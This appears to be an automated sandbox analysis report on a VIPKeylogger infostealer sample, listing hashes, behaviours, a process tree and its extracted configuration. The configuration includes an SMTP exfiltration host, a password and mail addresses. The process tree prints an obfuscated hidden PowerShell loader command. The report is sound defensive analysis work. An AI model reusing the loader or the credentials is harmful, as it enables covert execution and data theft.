Analysis
-
max time kernel
143s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-10-2024 16:08
Static task
static1
Behavioral task
behavioral1
Sample
Miljpaavirkningen.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Miljpaavirkningen.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Kreditnotaens/Plettes.ps1
Resource
win7-20240729-en
Behavioral task
behavioral4
Sample
Kreditnotaens/Plettes.ps1
Resource
win10v2004-20241007-en
General
-
Target
Miljpaavirkningen.exe
-
Size
895KB
-
MD5
0327d3ca2373bdcfad29ae18a7554884
-
SHA1
92ce0598c98f0ddc2ae136491f0e988ddcf29d49
-
SHA256
eb60de90ee98dcc76c344d75d96f2eb72bd4466a504f2668a660ec928abf07e1
-
SHA512
efdd810fab7b956116a99ba2d78e723474e14343c8cd5cde01ae8cb61a441aad14f516a151c530b42b7b8b1760405ca87c9415cbf53a541190c92e2250c751ee
-
SSDEEP
12288:N5e/L/ujA9jjzAmiTs3QCXDzo3vKz/oByv268ODurlKRFP7Pytafm6wY8yujWX6d:abu0wmt43w/9268OD6lm7Pytae6/B1G5
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
noVE@2879 - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 4684 powershell.exe 1956 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
msiexec.exemsiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 14 IoCs
Processes:
msiexec.exemsiexec.exeflow pid process 15 2828 msiexec.exe 17 2008 msiexec.exe 18 2828 msiexec.exe 20 2008 msiexec.exe 22 2828 msiexec.exe 29 2828 msiexec.exe 38 2828 msiexec.exe 47 2008 msiexec.exe 49 2828 msiexec.exe 55 2828 msiexec.exe 57 2008 msiexec.exe 61 2008 msiexec.exe 63 2828 msiexec.exe 65 2008 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 48 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
msiexec.exemsiexec.exepid process 2828 msiexec.exe 2008 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exepid process 1956 powershell.exe 4684 powershell.exe 2828 msiexec.exe 2008 msiexec.exe -
Drops file in Windows directory 4 IoCs
Processes:
Miljpaavirkningen.exedescription ioc process File opened for modification C:\Windows\resources\Nebengeschfter.ini Miljpaavirkningen.exe File opened for modification C:\Windows\resources\0409\gildes.lak Miljpaavirkningen.exe File opened for modification C:\Windows\Fonts\thyrididae.ini Miljpaavirkningen.exe File opened for modification C:\Windows\resources\0409\diaspidine.Inq Miljpaavirkningen.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Miljpaavirkningen.exepowershell.exepowershell.exemsiexec.exemsiexec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Miljpaavirkningen.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exepid process 1956 powershell.exe 1956 powershell.exe 4684 powershell.exe 4684 powershell.exe 1956 powershell.exe 1956 powershell.exe 1956 powershell.exe 1956 powershell.exe 1956 powershell.exe 1956 powershell.exe 4684 powershell.exe 4684 powershell.exe 1956 powershell.exe 4684 powershell.exe 4684 powershell.exe 4684 powershell.exe 2828 msiexec.exe 2008 msiexec.exe 2828 msiexec.exe 2008 msiexec.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.exepowershell.exepid process 1956 powershell.exe 4684 powershell.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exedescription pid process Token: SeDebugPrivilege 1956 powershell.exe Token: SeDebugPrivilege 4684 powershell.exe Token: SeIncreaseQuotaPrivilege 1956 powershell.exe Token: SeSecurityPrivilege 1956 powershell.exe Token: SeTakeOwnershipPrivilege 1956 powershell.exe Token: SeLoadDriverPrivilege 1956 powershell.exe Token: SeSystemProfilePrivilege 1956 powershell.exe Token: SeSystemtimePrivilege 1956 powershell.exe Token: SeProfSingleProcessPrivilege 1956 powershell.exe Token: SeIncBasePriorityPrivilege 1956 powershell.exe Token: SeCreatePagefilePrivilege 1956 powershell.exe Token: SeBackupPrivilege 1956 powershell.exe Token: SeRestorePrivilege 1956 powershell.exe Token: SeShutdownPrivilege 1956 powershell.exe Token: SeDebugPrivilege 1956 powershell.exe Token: SeSystemEnvironmentPrivilege 1956 powershell.exe Token: SeRemoteShutdownPrivilege 1956 powershell.exe Token: SeUndockPrivilege 1956 powershell.exe Token: SeManageVolumePrivilege 1956 powershell.exe Token: 33 1956 powershell.exe Token: 34 1956 powershell.exe Token: 35 1956 powershell.exe Token: 36 1956 powershell.exe Token: SeIncreaseQuotaPrivilege 4684 powershell.exe Token: SeSecurityPrivilege 4684 powershell.exe Token: SeTakeOwnershipPrivilege 4684 powershell.exe Token: SeLoadDriverPrivilege 4684 powershell.exe Token: SeSystemProfilePrivilege 4684 powershell.exe Token: SeSystemtimePrivilege 4684 powershell.exe Token: SeProfSingleProcessPrivilege 4684 powershell.exe Token: SeIncBasePriorityPrivilege 4684 powershell.exe Token: SeCreatePagefilePrivilege 4684 powershell.exe Token: SeBackupPrivilege 4684 powershell.exe Token: SeRestorePrivilege 4684 powershell.exe Token: SeShutdownPrivilege 4684 powershell.exe Token: SeDebugPrivilege 4684 powershell.exe Token: SeSystemEnvironmentPrivilege 4684 powershell.exe Token: SeRemoteShutdownPrivilege 4684 powershell.exe Token: SeUndockPrivilege 4684 powershell.exe Token: SeManageVolumePrivilege 4684 powershell.exe Token: 33 4684 powershell.exe Token: 34 4684 powershell.exe Token: 35 4684 powershell.exe Token: 36 4684 powershell.exe Token: SeDebugPrivilege 2828 msiexec.exe Token: SeDebugPrivilege 2008 msiexec.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
Miljpaavirkningen.exepowershell.exepowershell.exedescription pid process target process PID 2900 wrote to memory of 1956 2900 Miljpaavirkningen.exe powershell.exe PID 2900 wrote to memory of 1956 2900 Miljpaavirkningen.exe powershell.exe PID 2900 wrote to memory of 1956 2900 Miljpaavirkningen.exe powershell.exe PID 2900 wrote to memory of 4684 2900 Miljpaavirkningen.exe powershell.exe PID 2900 wrote to memory of 4684 2900 Miljpaavirkningen.exe powershell.exe PID 2900 wrote to memory of 4684 2900 Miljpaavirkningen.exe powershell.exe PID 1956 wrote to memory of 2828 1956 powershell.exe msiexec.exe PID 1956 wrote to memory of 2828 1956 powershell.exe msiexec.exe PID 1956 wrote to memory of 2828 1956 powershell.exe msiexec.exe PID 1956 wrote to memory of 2828 1956 powershell.exe msiexec.exe PID 4684 wrote to memory of 2008 4684 powershell.exe msiexec.exe PID 4684 wrote to memory of 2008 4684 powershell.exe msiexec.exe PID 4684 wrote to memory of 2008 4684 powershell.exe msiexec.exe PID 4684 wrote to memory of 2008 4684 powershell.exe msiexec.exe -
outlook_office_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Miljpaavirkningen.exe"C:\Users\Admin\AppData\Local\Temp\Miljpaavirkningen.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Rustling=Get-Content -raw 'C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Kreditnotaens\Plettes.For';$Wheeping171=$Rustling.SubString(53402,3);.$Wheeping171($Rustling)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Rustling=Get-Content -raw 'C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Kreditnotaens\Plettes.For';$Wheeping171=$Rustling.SubString(53402,3);.$Wheeping171($Rustling)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4684 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2008
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
854B
MD5e935bc5762068caf3e24a2683b1b8a88
SHA182b70eb774c0756837fe8d7acbfeec05ecbf5463
SHA256a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d
SHA512bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD59de7476fdc0bdfcc7b78c40eb0b7ae9c
SHA1e95ecafe1e4f0da7b4cd6d238d75d367f7c9b5cc
SHA2568f4a054cea59ba5bc892962f7ee8c79dafd4ea7e182af0d7fbe3ce89f93750bc
SHA5125bc6682c81b5cdea27a198215d02df7e64a53ca5c92d272d2b1140d32deea3d112b596e8eb35e6f79dc609964a32dab6a4ef83b3845b1057b86bd17537cd2cc2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize471B
MD5d27e8f4f186e50ed883dc1676cbb4038
SHA14dc99e2f5a1b7eafbceb0b837d9030424d67d8a4
SHA256ea5e76383ebf4550a6d4f3e561534cdbda582899df18c32c1ae085e0b1ff9ed8
SHA5123f6c599fdc2eaf4b42b1b594226438cc4d9b3a7846577b16307023c355757b794b1305b260c0d9e0071483e709dc7d5d190ba89ef3808185b4cd2d529c932372
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize472B
MD5fff9aba6fe7a03ac24297af4a6ef7600
SHA17ed4438da3b2bd2080a577c149f0029337d68fe8
SHA256510ed87ce53d8777b77a0de99754d355529f7f2f9e9a05690b927d1ced4dbe92
SHA51286b21267b1379717e414a374f113556c779246026569ab0adbda017d68532a62bd8999e5deb49f059b76c0c10ea15ca40e251f7efc5bdddbac7114ee002342c8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize170B
MD5c27fa00dc1085d8b5c3e5a472352be1e
SHA102872db0d0e387a0c8847ec4ac47e9efd2b3085a
SHA256cbbfedd33ac016733875b2642cfcb9d02826ef53c2890a4241e78500721b8548
SHA5122f0bca6aa88bd48405ca4cfc9f971fff00c7addbc4b73915c7da4b87ff402a200201c3e06bfa34d5f377986da7c3859ae9e4b1d58b88df42ba2401e37229bc8f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD5bad074583b9edbda960214d9d2989d27
SHA1c1483298c45614c26d4b13913a807e542825cfa8
SHA25655b08c598736312a6e7d71a5dacfcfe98b068efb42f51c29b68fd1ea11960e93
SHA512e5ecfd8b4b4ead2a836ca787d0e758b68a0adcf7886e7dc42aa7c5764ef41f90f227f4e706bff7bc01ed9e652baf02ff5bb38f7f97f68161a182fb4c07e79452
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize406B
MD5d852a75e8c72a8b2c7ba9c548f8977c7
SHA15453f7b58c7bad215fa02be14311b0f11e4da511
SHA2560d8c8dd7e7010ed7cac110b78c8986757bf98771f1e7e48315dbf4dc8943b7f1
SHA512a096631a9e09d72cb57b6ee9f3e6023ded304d81694d87141a97d1af1a1b7b3d6bb5a618cf2fabd144f51f72c08cebf21a2f69fbd477beee42d0c64bc6ec62df
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize402B
MD52253e478d18f083a4b82e57b93ba18f8
SHA10f32d954b3ba6137f76c30868afc43de9ec6a929
SHA256d9ab67d9b65b7aedf69d534360df30ea568e82b5f78ea94a326287f9aaae6db5
SHA512a0d78cf94253d05ee3f2d84c95e40e1936e50c51978aad03c1b771e56a895c528e64b93290923d726993d35ac64fc2b27d5fd008dc994ce97862962fa12fa38e
-
Filesize
775B
MD5fb241d07e8b3558780b49a931067493f
SHA1ed95b20fead530b5877817a20a8b629cd25f95b5
SHA25662ad1d76ff6fd74fb79518f040a9f3b8823bb2d02c59b99d0e26a1f186c6e298
SHA512a848644033ea3b2066de5847b1201ee6b766ea7405ba1adc7565c8e4dacc26513a4564b6d65850fe4bd49c84391bc5a5241b8603fa56cfb72352ac06dd621c8c
-
Filesize
821B
MD5ad76a5384f87a0351f5a06f2aaf56d77
SHA1a9d7ffe4954558c38e981aaf9080d7949e70322f
SHA25620d54f746aa64eaf59bc57256488cfffa62043df673e11e60b8451b1786651c1
SHA5129b401e6f51e4106fe747958cfca49c1a2df24ca8234a3519b274ddee770157b370c16d250aa8a2a6299064b6c39c851f3105a0fb5774b49fc0f289de22118a2d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
305KB
MD5ac099504b7fcd1e860e5f99bed658c5d
SHA1d8407dda46b17689fbdaa87b8825758bcef3f505
SHA256ba04b96f58feb43f6d6c44293368f73e0f4df459a36d8ddde855578be3682557
SHA5122087522c40059584e6daf3ccfca8d180cdc1a3ed7894ad5ea7dd9a254cb8b0d1995a31443e34da13a76a5716216789d2dce94e31cb1fb15ca2eea315abf92629
-
C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Kreditnotaens\Plettes.For
Filesize52KB
MD5ce0a682e2db6ee3b12ff901dd3bb16d8
SHA1d661a2f36066a9482a99c47c7773fc79161ea983
SHA256f73707d437fa4b1c7350b2eaf02faff3752d2267faa038e789fc3253aa08ae5e
SHA51275acea1f522ca924304dbaf44ce5732d04fe746c985edf2fe90e4de1ab036940f5f3a2cf76a0e8338f23014a1226de91af8b9c4aecfdb537a489b003b314f7c7
-
Filesize
32B
MD553898e643bd3e0ca22a462325ad62da4
SHA1e0f08a75fa5219f39e49c1b9f361119905da7d02
SHA256b947991000aea669ebfeadfb12de45121d46ad3dfd02296f373f9bf8ce4f1aff
SHA512aa17b99a93a04f7bbbb92f34c15921da80e20592a39b3921f1d3cc59fae55f66196b2be4f56716846daff041253cb63d7e373b84234d451181c87f1d097fe8ca